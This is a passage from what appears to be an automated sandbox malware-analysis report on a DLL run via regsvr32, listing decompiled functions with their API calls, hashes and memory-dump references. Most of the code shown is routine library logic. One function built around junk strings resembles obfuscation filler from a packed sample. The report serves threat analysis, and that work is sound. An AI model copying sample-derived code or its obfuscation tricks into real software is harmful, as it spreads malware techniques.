							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10004C10(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E100100ED(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E10010141(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1001370D( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E10014290(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E1000AE99(__ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E10001260( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E1001FC9C(_t56);
			}

APIs

__EH_prolog3.LIBCMT ref: 100143D0
SendMessageA.USER32 ref: 10014448
GetBkColor.GDI32(?), ref: 10014451
GetTextColor.GDI32(?), ref: 1001445D
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 100144EF

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
Instruction ID: aaf9ea3742fe6bc6e7247e3e7f83f19f993380783e2d83981db4afd0f75aeedd
Opcode Fuzzy Hash: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
Instruction Fuzzy Hash: 1541457450074ADFCB20CF64C884A9EB3B0FF08310B128919F89A9F2B2DB74E890DB51

Uniqueness

Uniqueness Score: -1.00%

Function 100071AD Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100071AD(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10045580; // 0x771f5646
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E1001FBF7(E1003305F, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E1000563B(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E100071AD(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10001260( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E1001FBB5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 100071CC
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 100071EB
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10007209
RegDeleteKeyA.ADVAPI32(?,?), ref: 10007284
RegCloseKey.ADVAPI32(?), ref: 1000728F

Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
Instruction ID: 857dbc2a6ce260c152275e15a4f46308dc9617d79fc9f0d391124e600494f057
Opcode Fuzzy Hash: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
Instruction Fuzzy Hash: 2A21D075D0425A9FEB25DB64CD41AEEB7B0FF08390F10422AED55AB290DB345E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001BA34 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001BA34(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FE50(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,?,?,?,?,?,10015D46,?,00000000,0000001C,100166B4,?,?,?,?,?), ref: 1001BA44
GetDeviceCaps.GDI32(?,00000058), ref: 1001BA7E
GetDeviceCaps.GDI32(?,0000005A), ref: 1001BA87

Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE90
Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FEAD

MulDiv.KERNEL32(?,000009EC,00000060), ref: 1001BAAB
MulDiv.KERNEL32(00000000,000009EC,?), ref: 1001BAB6

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
Instruction ID: 22d9993a61e9b7a788ac8545e9176f77a0c9c7fd087465b0058942df5384f877
Opcode Fuzzy Hash: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
Instruction Fuzzy Hash: D411E131600A14EFDB22AF55CC85D0EBBE9EF89750B124419FA829B361CB72ED41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001BAC2 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001BAC2(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FDE7(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,10015D8A,?,?,?,?,?,?), ref: 1001BAD2
GetDeviceCaps.GDI32(?,00000058), ref: 1001BB0C
GetDeviceCaps.GDI32(?,0000005A), ref: 1001BB15

Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE27
Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE44

MulDiv.KERNEL32(?,00000060,000009EC), ref: 1001BB39
MulDiv.KERNEL32(00000000,?,000009EC), ref: 1001BB44

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
Instruction ID: 64b43f4f01bdcb0d49ba4a6e9a36d092bff00c01b953ac3af172aaf16eee57d7
Opcode Fuzzy Hash: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
Instruction Fuzzy Hash: CF11AC35600A14AFEB22AF56CC85C1EBBF9EF89750B124419FA829B761C771ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10011005 Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10011005(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10045580; // 0x771f5646
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E10004E6E(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E10020F40(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1001FBB5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

APIs

lstrlenA.KERNEL32(?), ref: 1001102F
_memset.LIBCMT ref: 1001104C
GetWindowTextA.USER32 ref: 10011066
lstrcmpA.KERNEL32(00000000,?), ref: 10011078
SetWindowTextA.USER32(?,?), ref: 10011084

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
Instruction ID: 10167af52a95b6190f72f3b34ec66ed1a7e9255054ff2824fd61587a0385250f
Opcode Fuzzy Hash: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
Instruction Fuzzy Hash: 22018476A01268ABE712DB64CCC4BDF77ACEB59780F014065F946DB142EAB1DEC48760

Uniqueness

Uniqueness Score: -1.00%

Function 10008551 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10008551(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E100083A5() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1002291E(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100482f0(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000858F
GetSystemMetrics.USER32 ref: 100085A7
GetSystemMetrics.USER32 ref: 100085AE

Strings

DISPLAY, xrefs: 100085CB

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: DISPLAY
API String ID: 3136151823-865373369
Opcode ID: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
Instruction ID: ce2e2f080287dd97aac08b6d54948a152684e982f167b1d142294c492be0e5a9
Opcode Fuzzy Hash: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
Instruction Fuzzy Hash: 9B119471901624ABEB56DF648C8465B7BA9FF05781F118052FD45AE04AD271DB00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA02 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000BA02(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10011382(__ebx, _t25, __ebp, 0xc);
				_push(E1000AEB0);
				_t26 = E10010657(__ebx, 0x10048470, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E10004E6E(_t21, 0x10048470, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E100113EF(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E100094FA(_t21, 0x10048470, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

APIs

Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
Part of subcall function 10011382: InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
Part of subcall function 10011382: LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
Part of subcall function 10011382: EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6

Part of subcall function 10010657: __EH_prolog3_catch.LIBCMT ref: 1001065E

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 1000BA46
FreeLibrary.KERNEL32(?), ref: 1000BA56

Strings

hhctrl.ocx, xrefs: 1000BA2A
HtmlHelpA, xrefs: 1000BA40

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
Instruction ID: fae18e8e3df8c99190cd81beb17d79f1be991ccf9ce49b00c1c0f37f4cd6cf67
Opcode Fuzzy Hash: e901df98c7b20211684d7a886c9f888567c58a51fe2962439f01aaedd25188f5
Instruction Fuzzy Hash: 97018135204B03AFE322DF60DD05B4F7AD0EF457D1F018818F19AA5565DB30E9409623

Uniqueness

Uniqueness Score: -1.00%

Function 100030AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100030AA(intOrPtr _a4, intOrPtr _a8) {
				signed int _t7;
				short* _t20;

				_t20 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t7 = GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return E10020530( *((intOrPtr*)(_a4 + _t7 *  *0x100440d0 * 8)),  *((intOrPtr*)(_a8 + GetCurrencyFormatW(0, 0x11d4, _t20, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 8)));
			}

0x100030c0
0x100030ce
0x1000310d

APIs

GetCurrencyFormatW.KERNEL32 ref: 100030CE
GetCurrencyFormatW.KERNEL32 ref: 100030EE

Strings

xadqsavcbdfewescGADW, xrefs: 100030B9, 100030E0
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100030C0, 100030C5

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
Instruction ID: 846c07d914ee6a27032255a918b4843dc12a0f64b55843b4788eb39cb2351f94
Opcode Fuzzy Hash: eba1907676d7a635ea872fac9ed42042c5b18c37b6e64dbe33ba4f6f63d73e35
Instruction Fuzzy Hash: 7BF0B4312443197FE205D740EC82F927B5DD78A745F010056F700AF0E2CB6338248FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002BDD1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E1002BDD1() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
